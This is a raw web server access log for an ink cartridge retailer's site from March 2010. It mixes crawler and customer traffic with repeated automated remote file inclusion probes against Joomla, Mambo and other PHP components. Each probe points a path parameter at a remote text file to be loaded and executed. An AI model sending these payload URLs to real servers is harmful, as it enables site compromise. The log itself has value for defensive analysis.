67.195.115.218 - - [02/Mar/2010:14:18:57 -0800] "GET /phpbb/posting.php?mode=reply&t=18 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
70.43.132.26 - - [02/Mar/2010:14:19:31 -0800] "GET /email/images/inkmail19_03.gif HTTP/1.1" 200 16411 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "site.inkjetcartridge.com"
70.43.132.26 - - [02/Mar/2010:14:19:31 -0800] "GET /email/images/inkmail19_05.gif HTTP/1.1" 200 17180 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "site.inkjetcartridge.com"
70.43.132.26 - - [02/Mar/2010:14:19:31 -0800] "GET /email/images/inkmail19_02.gif HTTP/1.1" 200 6629 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "site.inkjetcartridge.com"
70.43.132.26 - - [02/Mar/2010:14:19:31 -0800] "GET /email/images/inkmail19_06.gif HTTP/1.1" 200 13666 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "site.inkjetcartridge.com"
70.43.132.26 - - [02/Mar/2010:14:19:31 -0800] "GET /email/images/inkmail19_04.gif HTTP/1.1" 200 18164 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "site.inkjetcartridge.com"
70.43.132.26 - - [02/Mar/2010:14:19:31 -0800] "GET /email/images/inkmail19_07.gif HTTP/1.1" 200 17578 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MS-RTC LM 8)" "site.inkjetcartridge.com"
66.230.221.15 - - [02/Mar/2010:14:20:18 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.230.221.15 - - [02/Mar/2010:14:20:18 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.230.221.15 - - [02/Mar/2010:14:20:18 -0800] "GET /write_comment_update.php?board_skin_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.199.39 - - [02/Mar/2010:14:22:39 -0800] "GET /logs/?M=A HTTP/1.1" 200 1081 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:14:25:55 -0800] "GET /phpbb/viewtopic.php?t=351 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:14:36:34 -0800] "GET /links/links8_4.html HTTP/1.0" 200 8683 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:14:50:41 -0800] "GET /?M=A HTTP/1.0" 200 2116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
68.6.137.140 - - [02/Mar/2010:14:56:11 -0800] "GET /boomerang_images/roi.gif HTTP/1.1" 200 8343 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
68.6.137.140 - - [02/Mar/2010:14:56:11 -0800] "GET /boomerang_images/amd.gif HTTP/1.1" 200 10242 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
68.6.137.140 - - [02/Mar/2010:14:56:11 -0800] "GET /boomerang_images/funfly.gif HTTP/1.1" 200 23033 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
68.6.137.140 - - [02/Mar/2010:14:56:11 -0800] "GET /boomerang_images/magma.gif HTTP/1.1" 200 8881 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
68.6.137.140 - - [02/Mar/2010:14:56:11 -0800] "GET /boomerang_images/lostminerranch.gif HTTP/1.1" 200 9260 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
68.6.137.140 - - [02/Mar/2010:14:56:11 -0800] "GET /boomerang_images/alaska.gif HTTP/1.1" 200 8147 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
68.6.137.140 - - [02/Mar/2010:14:56:11 -0800] "GET /boomerang_images/tri-fly.jpg HTTP/1.1" 200 7476 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
68.6.137.140 - - [02/Mar/2010:14:56:11 -0800] "GET /boomerang_images/profly.gif HTTP/1.1" 200 10139 "http://www.boomerangs.com/corporategifts.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
80.97.64.32 - - [02/Mar/2010:14:59:17 -0800] "GET //index.php?_PHPLIB[libdir]=http://www.canadahost.ca/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
80.97.64.32 - - [02/Mar/2010:14:59:17 -0800] "GET /logs///index.php?_PHPLIB[libdir]=http://www.canadahost.ca/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:15:01:08 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:15:01:08 -0800] "GET /include/mail.inc.php?skin_board_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:15:01:08 -0800] "GET /logs/scripts.log%20%20//include/mail.inc.php?skin_board_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:15:01:10 -0800] "GET /include/mail.inc.php?skin_board_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:15:01:11 -0800] "GET /logs/scripts.log%20%20//include/mail.inc.php?skin_board_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:15:01:11 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:15:02:53 -0800] "GET /phpbb/viewtopic.php?t=244 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
173.86.122.152 - - [02/Mar/2010:15:06:08 -0800] "GET /email/images/inkmail20_04.gif HTTP/1.1" 200 16920 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko)" "site.inkjetcartridge.com"
173.86.122.152 - - [02/Mar/2010:15:06:09 -0800] "GET /email/images/inkmail20_05.gif HTTP/1.1" 200 15268 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko)" "site.inkjetcartridge.com"
173.86.122.152 - - [02/Mar/2010:15:06:09 -0800] "GET /email/images/inkmail20_07.gif HTTP/1.1" 200 17556 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko)" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:15:19 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:15:19 -0800] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:15:19 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:15:37 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:15:37 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:15:37 -0800] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:16:42 -0800] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:16:42 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
194.249.18.67 - - [02/Mar/2010:15:16:42 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://thegodlike.com/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:15:19:56 -0800] "GET /phpbb/privmsg.php?mode=post&u=47 HTTP/1.0" 200 519 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.85.139.128 - - [02/Mar/2010:15:33:43 -0800] "GET /email/images/inkmail21_03.gif HTTP/1.1" 200 16134 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
72.85.139.128 - - [02/Mar/2010:15:33:43 -0800] "GET /email/images/inkmail21_02.gif HTTP/1.1" 200 15159 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
72.85.139.128 - - [02/Mar/2010:15:33:43 -0800] "GET /email/images/inkmail21_05.gif HTTP/1.1" 200 15725 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
72.85.139.128 - - [02/Mar/2010:15:33:43 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:15:35:36 -0800] "GET /phpbb/viewtopic.php?p=7 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
69.64.70.246 - - [02/Mar/2010:15:38:04 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LIB_DIR]=http://www.sclubfever.com/forum/db/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
69.64.70.246 - - [02/Mar/2010:15:38:04 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://www.sclubfever.com/forum/db/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
69.64.70.246 - - [02/Mar/2010:15:38:04 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sclubfever.com/forum/db/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
69.64.70.246 - - [02/Mar/2010:15:38:04 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sclubfever.com/forum/db/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:15:47:31 -0800] "GET /phpbb/viewtopic.php?p=1158 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
69.90.47.134 - - [02/Mar/2010:16:12:39 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
69.90.47.134 - - [02/Mar/2010:16:12:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
69.90.47.134 - - [02/Mar/2010:16:12:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:16:16:38 -0800] "GET //appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:16:16:38 -0800] "GET /logs/access_100101.log///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:16:16:39 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:16:19:16 -0800] "GET /phpbb/viewtopic.php?t=901 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
89.149.244.84 - - [02/Mar/2010:16:24:38 -0800] "GET /phpbb/posting.php?mode=reply&t=176 HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/viewtopic.php?t=176&start=300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
190.1.51.124 - - [02/Mar/2010:16:24:40 -0800] "POST /phpbb/posting.php HTTP/1.0" 200 518 "http://site.inkjetcartridge.com/phpbb/posting.php?mode=reply&t=176" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:16:28:43 -0800] "GET /phpbb/posting.php?mode=reply&t=2081 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
210.205.6.233 - - [02/Mar/2010:16:32:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [02/Mar/2010:16:32:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [02/Mar/2010:16:32:07 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.88.25.28 - - [02/Mar/2010:16:34:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:16:35:11 -0800] "GET //appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:16:35:11 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [02/Mar/2010:16:35:12 -0800] "GET /logs/access_100101.log%20%20///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.8.133.20 - - [02/Mar/2010:16:42:13 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "http://us.mc1803.mail.yahoo.com/mc/welcome?.partner=sbc&.gx=1&.tm=1267575594&.rand=fmbd0eff25nfv" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:42:44 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:42:44 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:42:44 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:42:44 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:42:46 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:42:46 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:16:42:53 -0800] "GET /phpbb/viewtopic.php?p=1922 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:49:56 -0800] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:49:59 -0800] "GET /logs/scripts.log/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:50:01 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:50:02 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [02/Mar/2010:16:50:02 -0800] "GET /logs/scripts.log%20%20/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:50:21 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:50:24 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:50:50 -0800] "GET /logs/access.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:16:51:25 -0800] "GET /phpbb/viewtopic.php?t=80 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:51:44 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:51:44 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:51:44 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:51:56 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:51:56 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:51:56 -0800] "GET /logs/access.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:52:11 -0800] "GET /logs/access.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:52:11 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.209.105.137 - - [02/Mar/2010:16:52:11 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:16:52:42 -0800] "GET /phpbb/viewtopic.php?p=3002 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
